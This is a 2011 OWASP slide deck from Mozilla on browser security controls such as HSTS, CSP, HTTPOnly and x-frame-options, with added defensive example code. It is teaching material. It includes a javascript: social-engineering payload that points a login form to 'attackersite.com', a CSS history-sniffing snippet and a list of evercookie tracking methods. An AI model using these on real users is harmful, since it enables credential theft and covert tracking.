Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Enabling Browser Security in Web Applications
August 25, 2011
Michael Coates - Mozilla
About
• Michael Coates
• Senior Manager, Mozilla
• Lead of Infrastructure Security Team
• [email protected]
• http://blog.mozilla.com/webappsec/
• http://michael-coates.blogspot.com
• @_mwc
Agenda
Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy
Fake certificate attack targets Facebook users in Syria (May 2011, theregister.co.uk)
How to Hijack Facebook Using Firesheep (October 2010, pcworld.com)
Internet traffic was routed via Chinese servers, U.S. military sites included (November 2010, washingtontimes.com)
Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers (June 2008, wired.com)
Locking Down SSL/TLS
Risks of Insecure Communication
High likelihood of attack
• Open wifi, municipal wifi, malicious ISP
• Easy to exploit
High impact to user
• Clandestine monitoring of population
• Injection of incorrect/malicious content
• No protection from any defensive systems
Design flaw in application
Insecure Session Management
Secure login over HTTPS: password submitted encrypted
Immediate redirect to HTTP: session ID sent cleartext <-- vulnerability point
[Diagram: login request to https://site.com/login, then redirect to http://site.com/profile; Firesheep attack point]
Insecure Redirects
User requests HTTP page, response redirects to HTTPS
302 response is HTTP <-- vulnerability point
[Diagram: HTTP request to mybank.com answered by a 302 redirect that is itself sent over HTTP]
Secure Design for Communication
HTTP Strict Transport Security (HSTS)
• Opt-in security control
• Website instructs compatible browser to enable STS for site
HSTS forces (for enabled site):
• All communication over HTTPS
• No insecure HTTP requests sent from browser
• No option for user to override untrusted certificates
Strict Transport Security
Browser prevents HTTP requests to HSTS site
Any request to site is “upgraded” to HTTPS
No clear text HTTP traffic ever sent to HSTS site
Browser assumes HTTPS for HSTS sites
[Diagram: browser upgrades the HTTP request to HTTPS before sending it]
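The HSTS behaviour above, as an added example that is not part of the original slides: a small browser-side model that records the Strict-Transport-Security header (only when it arrives over HTTPS, the chicken-and-egg from the FAQ) and upgrades later HTTP requests. parseHsts, HstsStore and upgradeRequest are names chosen here, not browser APIs.

```javascript
// Added example (not from the slides): a minimal model of how an HSTS-aware
// browser records the Strict-Transport-Security header and upgrades later
// requests. parseHsts, HstsStore and upgradeRequest are this example's names.

// Parse "max-age=31536000; includeSubDomains"; max-age is mandatory.
function parseHsts(headerValue) {
  const policy = { maxAge: null, includeSubDomains: false };
  for (const part of headerValue.split(';')) {
    const [name, value] = part.trim().split('=');
    const key = name.toLowerCase();
    if (key === 'max-age' && /^\d+$/.test(value)) policy.maxAge = Number(value);
    if (key === 'includesubdomains') policy.includeSubDomains = true;
  }
  return policy.maxAge === null ? null : policy;
}

// Browser-side store: hostname -> { expires, includeSubDomains }. The header
// is honoured only when it arrived over HTTPS, which is the chicken-and-egg
// from the FAQ: the very first visit still has to reach the site securely.
class HstsStore {
  constructor() { this.hosts = new Map(); }
  observe(url, headerValue, now) {
    const u = new URL(url);
    const policy = u.protocol === 'https:' ? parseHsts(headerValue) : null;
    if (!policy) return false;
    if (policy.maxAge === 0) { this.hosts.delete(u.hostname); return true; }
    this.hosts.set(u.hostname, { expires: now + policy.maxAge * 1000,
                                 includeSubDomains: policy.includeSubDomains });
    return true;
  }
  // Known if the host itself, or a parent domain with includeSubDomains,
  // has an unexpired entry.
  isKnown(hostname, now) {
    const labels = hostname.split('.');
    for (let i = 0; i < labels.length; i++) {
      const entry = this.hosts.get(labels.slice(i).join('.'));
      if (!entry || entry.expires <= now) continue;
      if (i === 0 || entry.includeSubDomains) return true;
    }
    return false;
  }
}

// "Any request to site is upgraded to HTTPS": rewrite the URL before it
// leaves the browser, so no cleartext request (and no cookie) is ever sent.
function upgradeRequest(url, store, now) {
  const u = new URL(url);
  if (u.protocol === 'http:' && store.isKnown(u.hostname, now)) u.protocol = 'https:';
  return u.href;
}
```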
Cookie Forcing
HSTS also protects against Cookie Forcing
HSTS FAQ
Is HSTS cert pinning? No
Chicken and the egg? Technically, but drastically less chance of attack
Certificate rotation problem? No - HSTS forces a valid certificate, doesn’t specify which
Browser support: currently Firefox & Chrome
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support
Protecting Outdated Users
HSTS supported in current browsers (Firefox, Chrome)
Older browsers all support the SECURE cookie flag
SECURE cookie flag
• Instructs browser to only send cookie over HTTPS
• Much less (and different) protection than HSTS, but a good defense in depth control
Secure Flag
SECURE Flag doesn’t prevent HTTP requests like HSTS
Just removes SECURE Cookies from HTTP request
[Diagram: the SECURE cookie is dropped from the HTTP request]
Defensive Design
HTTP Strict Transport Security
http://tools.ietf.org/html/draft-hodges-strict-transport-sec
Set SECURE flag for cookies
Secure application design for TLS
https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
Cross Site Scripting
Risks of XSS
Top web security issue on OWASP Top 10 (2011, 2007, 2004)
Impact: vulnerability allows attacker to change any aspect of a vulnerable web page
Business impact:
• Compromise of user accounts
• False data displayed on website
• Remote monitoring of user actions with website
• Full attacker control of content displayed and served from website
XSS Example
[Diagram: form with a Name field; injected login form (Login/Pass) submitting to the evil site; injected javascript <install malware>]
(1) Attacker submits malicious code
(2) Code is now part of webpage
(3) Malicious site steals passwords & installs malware
(4) Attacker spreads malicious URL: http://site.com/?a=%3cscript%3edocument%2e
Frustrating Problem
XSS issues can occur anywhere user data is used in a webpage
Difficult to identify all output locations
Many frameworks allow design patterns that lead to XSS issues
Content Security Policy (CSP)
CSP - new defensive control to eliminate XSS
Allows web site to specify where JavaScript can be loaded from
Injected JavaScript via XSS is rendered inert
Violations & potential XSS attacks are reported to web site for investigation
CSP policy:
X-Content-Security-Policy: allow 'self'; img-src 'self' data:
XSS Example with CSP
(1) Attacker submits malicious code
(2) CSP prevents script execution; violation report sent to site.com/CSPalert
(3) Site safe to use
Implementing CSP
Some code changes needed to externalize JavaScript
Run CSP in report-only mode to test
Enable CSP and protect users with browsers supporting CSP
Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users
CSP Violation Reporting
Violations of CSP policy reported to specified URL
Acts as XSS intrusion detection system
CSP supported in portion of site users, XSS IDS benefits all
Reported data is from client, trust accordingly
X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi
CSP Violation Reporting
[Diagram: injected javascript triggers a CSP violation; report sent to site.com/CSPalert]
Report includes:
• HTTP request
• request-headers
• blocked-uri
• violation-directive
• original-policy
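A report-uri collector for the reports described above, as an added example that is not from the slides or from any browser or OWASP code: it follows the "reported data is from client, trust accordingly" advice by bounding and cleaning every field, then groups reports so one injection attempt seen by many users becomes one alert. The field names follow the slide's list; the sample report bodies are constructed here.

```javascript
// Added example (not from the slides): a report-uri collector that treats each
// CSP violation report as untrusted client input, as the slide advises.
// Field names follow the slide's list; the sample reports are constructed.

const REPORT_FIELDS = ['request', 'request-headers', 'blocked-uri',
                       'violation-directive', 'original-policy'];
const MAX_FIELD_LEN = 2048;

// Normalise one report body, or return null if it is not usable. Every field
// is coerced to a bounded, control-character-free string so a hostile client
// cannot push objects, huge blobs or log-injection bytes into the pipeline.
function parseCspReport(body) {
  let parsed;
  try { parsed = JSON.parse(body); } catch (e) { return null; }
  const report = parsed && parsed['csp-report'];
  if (!report || typeof report !== 'object') return null;
  const record = {};
  for (const field of REPORT_FIELDS) {
    const v = report[field];
    record[field] = typeof v === 'string'
      ? v.replace(/[\x00-\x1f\x7f]/g, '?').slice(0, MAX_FIELD_LEN) : '';
  }
  return record['violation-directive'] ? record : null;
}

// Group by directive + blocked host, so one injection attempt seen by many
// users is one alert rather than a flood (the "XSS IDS" role of report-uri).
function summarise(bodies) {
  const counts = new Map();
  for (const body of bodies) {
    const r = parseCspReport(body);
    if (!r) continue;
    let host = 'unknown';
    try { host = new URL(r['blocked-uri']).host; } catch (e) {}
    const key = `${r['violation-directive']} ${host}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return counts;
}

// Constructed sample reports (not real traffic): two violations, one with a
// stray newline in blocked-uri, one malformed object and one non-JSON body.
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': { request: 'GET /profile HTTP/1.1',
    'request-headers': 'Host: site.com', 'blocked-uri': 'http://evil.example/x.js',
    'violation-directive': 'script-src', 'original-policy': "allow 'self'; report-uri /CSPalert" } }),
  JSON.stringify({ 'csp-report': { 'blocked-uri': 'http://evil.example/y.js\n',
    'violation-directive': 'script-src' } }),
  '{"csp-report": 5}',
  'not json',
];
```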
CSP Violation Report
Other CSP Benefits
• Prevent ClickJacking via frame-ancestors
• Control embedded frames via frame-src
• Control domains for images via img-src
• Control target domains via xhr-src
• Enforce specific protocols (https://*.foo.com)
• Future enhancement to control actions & malicious forms
Protecting Outdated Users
HTTPOnly mitigates one of the XSS impacts - session hijacking
Supported in all recent browsers
Easy, opt-in security control to protect users
[Diagram: injected javascript tries to send Cookie: SessionID to the attacker’s site]
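The two cookie attributes the deck recommends (the SECURE flag from the "Protecting Outdated Users" slide in the TLS section, and HTTPOnly here), shown together in an added example that is not from the slides: a cookie-jar model in which SECURE cookies are omitted from HTTP requests and HTTPOnly cookies are invisible to script. parseSetCookie, cookieHeaderFor, documentCookieView and the sample jar are constructed for this example.

```javascript
// Added example (not from the slides): a cookie-jar model showing what the
// SECURE and HTTPOnly attributes change on the browser side. parseSetCookie,
// cookieHeaderFor and documentCookieView are this example's own names.

// Parse a Set-Cookie value into { name, value, secure, httpOnly }.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   secure: false, httpOnly: false };
  for (const attr of attrs) {
    const key = attr.toLowerCase();
    if (key === 'secure') cookie.secure = true;
    if (key === 'httponly') cookie.httpOnly = true;
  }
  return cookie;
}

// The Cookie request header the browser builds for a URL. SECURE cookies are
// left out of plain-HTTP requests; the request itself still goes out in
// cleartext, which is why the slides rank this below HSTS.
function cookieHeaderFor(jar, url) {
  const https = new URL(url).protocol === 'https:';
  return jar.filter(c => https || !c.secure)
            .map(c => `${c.name}=${c.value}`).join('; ');
}

// What injected script sees through document.cookie: HTTPOnly cookies are
// hidden, so an XSS payload cannot read the session ID to hijack the session.
function documentCookieView(jar) {
  return jar.filter(c => !c.httpOnly)
            .map(c => `${c.name}=${c.value}`).join('; ');
}

// Constructed sample jar: a hardened session cookie and a plain preference.
const SAMPLE_JAR = [
  'SessionID=abc123; Secure; HttpOnly; Path=/',
  'theme=dark; Path=/',
].map(parseSetCookie);
```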
Defensive Design
CSP gaining traction, potential to solve pressing web security risk
HTTPOnly flag - easy setting to add additional layer of defense
OWASP XSS Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Socio-Technical Attacks “Visual Fraud”
ClickJacking
Attacker includes victim page in iframe & overlays opaque layer
Attacker’s image entices click and text interaction
Clicks are registered on victim site underneath
User inadvertently performs action at victim site
[Diagram: attacker’s overlay on top of the victim site]
ClickJacking Example
[Diagram: the overlay shows “Click the Bouncing Ball”; underneath it the victim page shows “[ ] Grant Joe full profile access”, “Click to follow Joe” and a Confirm button]
ClickJacking Defenses
x-frame-options header
• Full solution
• Compatible with new versions of browsers
Frame busting scripts
• Partial solution
• Compatible with older browsers
x-frame-options
Additional header for HTTP response
Instructs browser to disallow framing
Two options - DENY, SAMEORIGIN

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: DENY

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: SAMEORIGIN
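Both sides of the header above, as an added example that is not from the slides or from any browser: a server helper that adds x-frame-options to a response, and the browser-side decision of whether a framed document may render. Only DENY and SAMEORIGIN are modelled, as on the slide; treating an absent or unrecognised value as "framing allowed" is this example's assumption, chosen because that is exactly the exposure the header closes.

```javascript
// Added example (not from the slides): the server adds x-frame-options, the
// browser decides whether the framed document may render. withFrameOptions
// and framingAllowed are this example's own names.

// Server: copy the response headers and append x-frame-options.
function withFrameOptions(headers, mode) {
  const m = String(mode).toUpperCase();
  if (m !== 'DENY' && m !== 'SAMEORIGIN') throw new Error('unsupported x-frame-options mode');
  return { ...headers, 'x-frame-options': m };
}

// Browser: may a response carrying `headers` be rendered inside a frame?
// frameOrigin is the framed page's origin, topOrigin the top-level page's.
// No header, or a value this model does not know, leaves framing allowed
// (assumption, see lead-in), which is the ClickJacking exposure itself.
function framingAllowed(headers, frameOrigin, topOrigin) {
  const name = Object.keys(headers).find(h => h.toLowerCase() === 'x-frame-options');
  if (!name) return true;
  const value = String(headers[name]).trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return frameOrigin === topOrigin;
  return true;
}

// Constructed sample response headers, mirroring the slide's two responses.
const BASE_HEADERS = { 'Server': 'Apache-Coyote/1.1', 'Content-Type': 'text/html;' };
const DENY_RESPONSE = withFrameOptions(BASE_HEADERS, 'DENY');
const SAMEORIGIN_RESPONSE = withFrameOptions(BASE_HEADERS, 'SAMEORIGIN');
```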
x-frame-options
Targeted site not displayed if framed
Error page displayed
Prevents ClickJacking attack
[Diagram: attempted ClickJack (attacker’s overlay over the victim site) next to the x-f-o result (error page)]
Frame Busting Scripts
JavaScript within page to detect framing
Will either “bust” the frame or not display content
Not optimal solution - techniques available to bypass defense
<script>
// Frame busting: if this document is not the top-level window, replace the
// top-level location with our own so the page cannot stay inside a frame.
if (top != self) { top.location = self.location; }
</script>
URL Social Engineering
“Cool new hidden feature”
“Get 10 free gems for your game”
Click the square and type the secret combination
ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter
Click square - selected text element
ctrl a - select all text
ctrl c - copy text
ctrl l - select location bar
ctrl v - paste text
enter - execute JavaScript
Danger of those keystrokes...
The hidden, copied text (the slide’s example, reformatted):
javascript:
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", document.location, false);
xmlHttp.send();
var xmlDoc = xmlHttp.responseText;
var str = xmlDoc;
var x = str.replace(/somesite\.com/, "attackersite.com");
document.writeln(x);
[Diagram: location bar showing javascript:....]
URL JavaScript
Pasted JavaScript has full control of page
• Can rewrite page
• Extract and send any data
• No indication to user
[Diagram: before, a login form (username, password, submit) on somesite.com; after, the same form now pointing at attackersite.com]
Defense
Code change to browser
• Remove association between javascript: & loaded document
• Renders attack inert
Privacy
Your Android Phone is Tracking You (April 2011, pcworld.com)
Nissan car secretly shares driver data with websites (June 2011, theregister.co.uk)
Your iPhone Is Tracking Your Every Move (April 2011, readwriteweb.com)
Mobile-App Makers Face U.S. Privacy Investigation (April 2011, online.wsj.com)
Privacy
Business gains from gathering user data
Privacy infringement based on laws
Privacy concerns based on user expectations
Need better options for user to understand collected data, control flow and accessibility of user data
Browser Profiling
Panopticlick
Fingerprints browser based on provided information:
• Plugins installed
• Font support
• Screen resolution
• Time zone
“Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.”
CSS History Sniffing
Determine user’s browsing habits with CSS
Visited link styled differently than non-visited link
CSS and element inspection determines visited pages
Issue fixed March 2010
[Diagram: visited link vs unvisited link colouring]
// Sniffing check: read the computed colour of a link and compare it with
// the default unvisited colour (the slide’s example, reformatted).
if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
  // link.href has not been visited
} else {
  // link.href has been visited
}
http://dbaron.org/mozilla/visited-privacy
Evercookie
“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”
Multiple methods of storing data on the client
Could be abused for unauthorized tracking
Goal to keep user in control of data storage / tracking mechanisms
• Standard HTTP Cookies
• Local Shared Objects (Flash Cookies)
• Silverlight Isolated Storage
• Storing cookies in RGB values of auto-generated, force-cached PNGs, using the HTML5 Canvas tag to read pixels (cookies) back out
• Storing cookies in Web History
• Storing cookies in HTTP ETags
• Storing cookies in Web cache
• window.name caching
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite
http://samy.pl/evercookie/
Do Not Track
Adds header DNT: 1 to all web requests
Tells websites user does not want browsing activity to be tracked
http://dnt.mozilla.org/
Permission Manager
Granular management options for user interaction with sites
Control:
• Location settings
• Cookie settings
• Popup windows
• Offline storage
about:permissions
Privacy Design
Privacy controls distinguish applications
Design with privacy in mind
Growing support for DNT
Closing
Defense in depth
Many new security controls to enhance security:
• Strict Transport Security
• Content Security Policy
• x-frame-options
• Do Not Track